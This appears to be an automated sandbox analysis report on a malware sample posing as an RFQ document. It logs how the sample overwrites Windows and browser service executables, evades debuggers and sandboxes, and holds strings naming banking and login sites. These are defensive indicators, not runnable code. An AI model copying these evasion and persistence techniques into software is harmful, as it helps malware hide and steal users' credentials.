                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to dropped file
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B9CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_00B9CBD0
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00485376
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00423187
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Windows\System32\AppVClient.exeCode function: 7_2_00B652A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 7_2_00B652A0
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00CD52A0 GetSystemDefaultLangID, lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] lea ecx, dword ptr [eax-00000419h] 11_2_00CD52A0
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeAPI/Special instruction interceptor: Address: E815D4
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\choice.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A7096E rdtsc 10_2_03A7096E
                Source: C:\Windows\SysWOW64\choice.exeWindow / User API: threadDelayed 4170Jump to behavior
                Source: C:\Windows\SysWOW64\choice.exeWindow / User API: threadDelayed 5800Jump to behavior
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeDropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeDropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to dropped file
                Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                Source: C:\Windows\System32\AppVClient.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeAPI coverage: 4.9 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe TID: 6792Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\choice.exe TID: 6820Thread sleep count: 4170 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\choice.exe TID: 6820Thread sleep time: -8340000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\choice.exe TID: 6820Thread sleep count: 5800 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\choice.exe TID: 6820Thread sleep time: -11600000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\choice.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_004049A0
                Source: G109m407.16.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: G109m407.16.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: G109m407.16.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: G109m407.16.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: G109m407.16.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: G109m407.16.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: G109m407.16.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: G109m407.16.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: G109m407.16.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: G109m407.16.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1526907938.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp, RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541118228.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp, RFQ _ Virtue 054451000085.exe, 00000000.00000003.1526907938.0000000000CB6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: G109m407.16.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: AppVClient.exe, 00000007.00000002.1515587138.0000000000136000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.1514767377.0000000000110000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.1514968566.0000000000117000.00000004.00000020.00020000.00000000.sdmp, AppVClient.exe, 00000007.00000003.1515114498.000000000012E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: appv:SoftwareClients/appv:JavaVirtualMachine
                Source: G109m407.16.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: G109m407.16.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: G109m407.16.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: G109m407.16.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: G109m407.16.drBinary or memory string: discord.comVMware20,11696492231f
                Source: choice.exe, 00000010.00000002.2744008676.0000000002675000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: iavbXasnTxCeiF.exe, 00000011.00000002.2750124223.0000000000FE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$
                Source: firefox.exe, 00000013.00000002.2287269038.000000000347C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAA
                Source: G109m407.16.drBinary or memory string: global block list test formVMware20,11696492231
                Source: G109m407.16.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: G109m407.16.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: G109m407.16.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: G109m407.16.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: G109m407.16.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: RFQ _ Virtue 054451000085.exe, 00000000.00000002.1541530686.0000000000D04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe"
                Source: G109m407.16.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: G109m407.16.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: G109m407.16.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: G109m407.16.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: G109m407.16.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: G109m407.16.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: G109m407.16.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: G109m407.16.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: G109m407.16.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeAPI call chain: ExitProcess graph end nodegraph_0-109749
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A7096E rdtsc 10_2_03A7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_00417D33 LdrLoadDll,10_2_00417D33
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00473F09 BlockInput,0_2_00473F09
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B3A
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00435A7C
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00404B37 LoadLibraryA,GetProcAddress,0_2_00404B37
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00576594 mov eax, dword ptr fs:[00000030h]0_2_00576594
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00B71130 mov eax, dword ptr fs:[00000030h]0_2_00B71130
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00BB3F3D mov eax, dword ptr fs:[00000030h]0_2_00BB3F3D
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00E801F0 mov eax, dword ptr fs:[00000030h]0_2_00E801F0
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00E818A0 mov eax, dword ptr fs:[00000030h]0_2_00E818A0
                Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exeCode function: 0_2_00E81840 mov eax, dword ptr fs:[00000030h]0_2_00E81840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2E388 mov eax, dword ptr fs:[00000030h]10_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2E388 mov eax, dword ptr fs:[00000030h]10_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2E388 mov eax, dword ptr fs:[00000030h]10_2_03A2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5438F mov eax, dword ptr fs:[00000030h]10_2_03A5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A5438F mov eax, dword ptr fs:[00000030h]10_2_03A5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A28397 mov eax, dword ptr fs:[00000030h]10_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A28397 mov eax, dword ptr fs:[00000030h]10_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A28397 mov eax, dword ptr fs:[00000030h]10_2_03A28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A403E9 mov eax, dword ptr fs:[00000030h]10_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A403E9 mov eax, dword ptr fs:[00000030h]10_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A403E9 mov eax, dword ptr fs:[00000030h]10_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A403E9 mov eax, dword ptr fs:[00000030h]10_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A403E9 mov eax, dword ptr fs:[00000030h]10_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A403E9 mov eax, dword ptr fs:[00000030h]10_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A403E9 mov eax, dword ptr fs:[00000030h]10_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A403E9 mov eax, dword ptr fs:[00000030h]10_2_03A403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]10_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]10_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A4E3F0 mov eax, dword ptr fs:[00000030h]10_2_03A4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A663FF mov eax, dword ptr fs:[00000030h]10_2_03A663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AEC3CD mov eax, dword ptr fs:[00000030h]10_2_03AEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]10_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]10_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]10_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]10_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]10_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A3A3C0 mov eax, dword ptr fs:[00000030h]10_2_03A3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A383C0 mov eax, dword ptr fs:[00000030h]10_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A383C0 mov eax, dword ptr fs:[00000030h]10_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A383C0 mov eax, dword ptr fs:[00000030h]10_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A383C0 mov eax, dword ptr fs:[00000030h]10_2_03A383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB63C0 mov eax, dword ptr fs:[00000030h]10_2_03AB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AD43D4 mov eax, dword ptr fs:[00000030h]10_2_03AD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AD43D4 mov eax, dword ptr fs:[00000030h]10_2_03AD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6A30B mov eax, dword ptr fs:[00000030h]10_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6A30B mov eax, dword ptr fs:[00000030h]10_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A6A30B mov eax, dword ptr fs:[00000030h]10_2_03A6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A2C310 mov ecx, dword ptr fs:[00000030h]10_2_03A2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A50310 mov ecx, dword ptr fs:[00000030h]10_2_03A50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AD437C mov eax, dword ptr fs:[00000030h]10_2_03AD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]10_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]10_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]10_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]10_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]10_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]10_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]10_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]10_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]10_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]10_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]10_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]10_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]10_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]10_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB2349 mov eax, dword ptr fs:[00000030h]10_2_03AB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB035C mov eax, dword ptr fs:[00000030h]10_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB035C mov eax, dword ptr fs:[00000030h]10_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB035C mov eax, dword ptr fs:[00000030h]10_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB035C mov ecx, dword ptr fs:[00000030h]10_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB035C mov eax, dword ptr fs:[00000030h]10_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AB035C mov eax, dword ptr fs:[00000030h]10_2_03AB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AFA352 mov eax, dword ptr fs:[00000030h]10_2_03AFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AD8350 mov ecx, dword ptr fs:[00000030h]10_2_03AD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A402A0 mov eax, dword ptr fs:[00000030h]10_2_03A402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03A402A0 mov eax, dword ptr fs:[00000030h]10_2_03A402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AC62A0 mov eax, dword ptr fs:[00000030h]10_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AC62A0 mov ecx, dword ptr fs:[00000030h]10_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AC62A0 mov eax, dword ptr fs:[00000030h]10_2_03AC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_2_03AC62A0 mov eax, dword ptr fs:[00000030h]10_2_03AC62A0
